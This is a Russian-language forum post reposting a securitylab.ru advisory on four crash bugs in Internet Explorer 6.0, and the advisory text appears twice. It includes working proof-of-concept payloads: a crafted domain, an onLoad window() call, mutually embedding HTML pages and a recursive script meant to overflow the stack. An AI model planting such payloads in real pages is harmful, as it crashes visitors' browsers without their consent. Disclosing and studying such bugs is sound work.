Shu_b
02.06.2005, 12:46
Множественные уязвимости в Microsoft Internet Explorer
Программа: Microsoft Internet Explorer 6.0
Опасность: Средняя
Наличие эксплоита: Да
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю аварийно завершить работу приложения.
1. Уязвимость существует в обработке определенных URL при добавлении сайта в ограниченную зону (restricted zone). Удаленный пользователь может с помощью специально сформированного доменного имени вызвать аварийное завершение работы приложения. Пример:
4.3.2.1btf-errorreporting.btf.de
2. Переполнение буфера обнаружено при обработке javascript функции window(). Удаленный пользователь может аварийно завершить работу приложения. Пример:
<body onLoad="window()">
3. Отказ в обслуживании при обработке подключаемых файлов. Пример:
Page #1 (save as "btf1.htm"):
<html><head><title>BTF - MSIE crash</title></head><body>
< object data="./btf2.htm" width="0" height="0"></object>
< /body></html>
Page #2 (save as "btf2.htm"):
<html><head><title>BTF - MSIE crash</title></head><body>
< object data="./btf1.htm" width="0" height="0"></object>
< /body></html>
4. Множественные переполнения стека в ntdll.dll. Пример:
<script>
window.onerror=new Function("history.go(0)");
function btf(){btf();}
btf();
< /script>
Решение: Способов устранения уязвимости не существует в настоящее время.
Источник: securitylab.ru
Программа: Microsoft Internet Explorer 6.0
Опасность: Средняя
Наличие эксплоита: Да
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю аварийно завершить работу приложения.
1. Уязвимость существует в обработке определенных URL при добавлении сайта в ограниченную зону (restricted zone). Удаленный пользователь может с помощью специально сформированного доменного имени вызвать аварийное завершение работы приложения. Пример:
4.3.2.1btf-errorreporting.btf.de
2. Переполнение буфера обнаружено при обработке javascript функции window(). Удаленный пользователь может аварийно завершить работу приложения. Пример:
<body onLoad="window()">
3. Отказ в обслуживании при обработке подключаемых файлов. Пример:
Page #1 (save as "btf1.htm"):
<html><head><title>BTF - MSIE crash</title></head><body>
< object data="./btf2.htm" width="0" height="0"></object>
< /body></html>
Page #2 (save as "btf2.htm"):
<html><head><title>BTF - MSIE crash</title></head><body>
< object data="./btf1.htm" width="0" height="0"></object>
< /body></html>
4. Множественные переполнения стека в ntdll.dll. Пример:
<script>
window.onerror=new Function("history.go(0)");
function btf(){btf();}
btf();
< /script>
Решение: Способов устранения уязвимости не существует в настоящее время.
Источник: securitylab.ru